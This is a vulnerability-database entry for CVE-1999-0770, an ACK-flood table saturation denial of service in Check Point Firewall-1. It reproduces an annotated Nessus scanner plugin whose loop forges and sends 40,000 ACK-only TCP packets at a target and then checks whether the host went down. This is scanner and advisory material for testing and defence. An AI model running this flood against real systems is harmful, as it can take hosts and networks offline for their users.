Vulnerabilities > CVE-1999-0770 - Unspecified vulnerability in Checkpoint Firewall-1 3.0/4.0

047910
CVSS 2.1 - LOW
Attack vector
LOCAL
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
local
low complexity
checkpoint
nessus
exploit available

Summary

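Firewall-1 sets a long timeout for connections that begin with an ACK or any other non-SYN packet, allowing an attacker to conduct a denial of service via a large number of connection attempts to unresponsive systems: each attempt leaves a long-lived entry in the firewall's connection table (the "table saturation" named in the Exploit-DB entry below). Note that the score block above lists the attack vector as LOCAL, whereas the condition described here is triggered by network packets and the Nessus plugin below scores it AV:N; check the vector against your own exposure before relying on the LOW rating.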

Vulnerable Configurations

Part Description Count
Application
Checkpoint
2

Exploit-Db

description: Check Point Software Firewall-1 3.0/1 4.0 Table Saturation Denial of Service Vulnerability. CVE-1999-0770. DoS exploit for hardware platform
id: EDB-ID:19436
last seen: 2016-02-02
modified: 1999-07-29
published: 1999-07-29
reporter: Lance Spitzner
source: https://www.exploit-db.com/download/19436/
title: Check Point Software Firewall-1 3.0/1 4.0 Table Saturation Denial of Service Vulnerability

Nessus

NASL family: Denial of Service
NASL id: STREAM.NASL
description: It seems it was possible to make the remote server crash using the 'stream' (or 'raped') attack.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 10271
published: 2000-01-21
reporter: This script is Copyright (C) 2000-2019 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/10271
title: TCP/IP ACK Packet Saturation Remote DoS (stream.c)
code
#
# (C) Tenable Network Security, Inc.
#

# Script audit and contributions from Carmichael Security
#      Erik Anderson <[email protected]> (nb: domain no longer exists)
#      Added links to the Bugtraq message archive
#

include("compat.inc");

# Metadata registration. When the `description` variable is set, the script
# only declares its identity, references, scoring and scheduling constraints,
# then exits without sending any traffic.
if (description)
{
 script_id(10271);
 script_version("1.34");
 script_cvs_date("Date: 2019/03/06 18:38:55");

 # NOTE(review): the finding is tagged with the Firewall-1 CVE, but nothing in
 # this script identifies the target product. A hit means "the host stopped
 # responding after the flood", not "CVE-1999-0770 confirmed on Firewall-1".
 script_cve_id("CVE-1999-0770");
 script_bugtraq_id(549);

 script_name(english:"TCP/IP ACK Packet Saturation Remote DoS (stream.c)");
 script_summary(english:"Crashes the remote host using the 'stream' attack");

 script_set_attribute(attribute:"synopsis", value:"The remote host is vulnerable to a denial of service.");
 script_set_attribute(attribute:"description", value:
"It seems it was possible to make the remote server crash using the
'stream' (or 'raped') attack.

An attacker may use this flaw to shut down this server, thus
preventing your network from working properly.");
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/1999/Jul/247");
 # The IP Filter rules in the solution text put all inbound TCP into group 100
 # with a default block, and pass only segments carrying the SYN flag while
 # keeping state. ACK segments that match no tracked connection are therefore
 # dropped instead of being processed.
 script_set_attribute(attribute:"solution", value:
"Solution :

Contact your operating system vendor for a patch.

- If you use IP filter, then add these rules :

  block in quick proto tcp from any to any head 100
  pass in quick proto tcp from any to any flags S keep state group 100
  pass in all");
  # CVSS v2 base: network vector, low complexity, no authentication,
  # availability impact complete, no confidentiality or integrity impact.
  # Temporal: proof-of-concept exploit, official fix, confirmed report.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"vuln_publication_date", value:"1999/07/29");
 script_set_attribute(attribute:"plugin_publication_date", value:"2000/01/21");

 # Flagged as a potential vulnerability: the result is inferred from the
 # host's behaviour, not from a version or configuration check.
 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 # ACT_FLOOD declares this as a flooding test. Scanners typically exclude
 # this category when safe checks are enabled -- confirm in the scan policy.
 script_category(ACT_FLOOD);
 script_copyright(english:"This script is Copyright (C) 2000-2019 Tenable Network Security, Inc.");
 script_family(english:"Denial of Service");

 # Only scheduled when the paranoid-report setting is present in the KB.
 script_require_keys("Settings/ParanoidReport");

 exit(0);
}

include("audit.inc");
include("global_settings.inc");

# Run-time guards and packet parameters for the test.

# Bail out through the audit trail unless the paranoia level is at least 2.
if (report_paranoia < 2) audit(AUDIT_PARANOID);


# The packets forged later in this script are IPv4 (ip_v : 4), so IPv6
# targets are skipped silently.
if ( TARGET_IS_IPV6 ) exit(0);
# Source address placed in every forged packet; presumably the scanner's own
# address -- confirm against compat.inc.
addr = compat::this_host();
# Random starting values for the IP id, TCP source port and sequence number.
id = rand();
sport = rand();
seq = rand();

# Prefer a port already known to be open on the target; otherwise fall back
# to a random one.
port = get_host_open_port();
# NOTE(review): `rand() % 65535` yields 0..65534, so the fallback can select
# port 0 and can never select 65535.
if(!port)port = rand() % 65535;


# Availability test: send the packet burst between start_denial() and
# end_denial(), then report only if the host is no longer considered alive.
start_denial();
# 40000 TCP segments with only the ACK flag set and no preceding SYN, so
# none of them belongs to an established connection.
for(i=0;i<40000;i=i+1)
{
 # Each packet gets the next IP id, source port and sequence number.
 id = id + 1;
 sport = sport + 1;
 seq  = seq+1;
 # Detection hint: the constant TOS 0x08, TTL 255 and (below) window 2048,
 # combined with sequentially increasing id/sport/seq from one source, make
 # this traffic straightforward to recognise in a capture or flow log.
 ip = forge_ip_packet(   ip_v : 4,
			ip_hl : 5,
			ip_tos : 0x08,
			ip_len : 20,
		        ip_id : id,
			ip_p : IPPROTO_TCP,
			ip_ttl : 255,
		        ip_off : 0,
			ip_src : addr);

 tcpip = forge_tcp_packet(    ip      : ip,
			     th_sport : sport,
			     th_dport : port,
			     th_flags : TH_ACK,
		             th_seq   : seq,
			     th_ack   : 0,
			     th_x2    : 0,
		 	     th_off   : 5,
			     th_win   : 2048,
			     th_urp   : 0);


 # pcap_active:FALSE -- presumably send without waiting to capture a reply.
 send_packet(tcpip, pcap_active:FALSE);
}
# Pause before the liveness check so the result reflects the host's state
# after the burst, not during it.
sleep(5);
alive = end_denial();

# NOTE(review): a result is produced only when the host is judged dead. A
# device that stays reachable while its connection table is saturated (the
# condition the CVE summary describes) would apparently go unreported --
# confirm against what end_denial() actually probes.
if(!alive)     {
                # Record the outage in the knowledge base and raise the
                # finding against port 0.
                set_kb_item(name:"Host/dead", value:TRUE);
                security_hole(0);
                }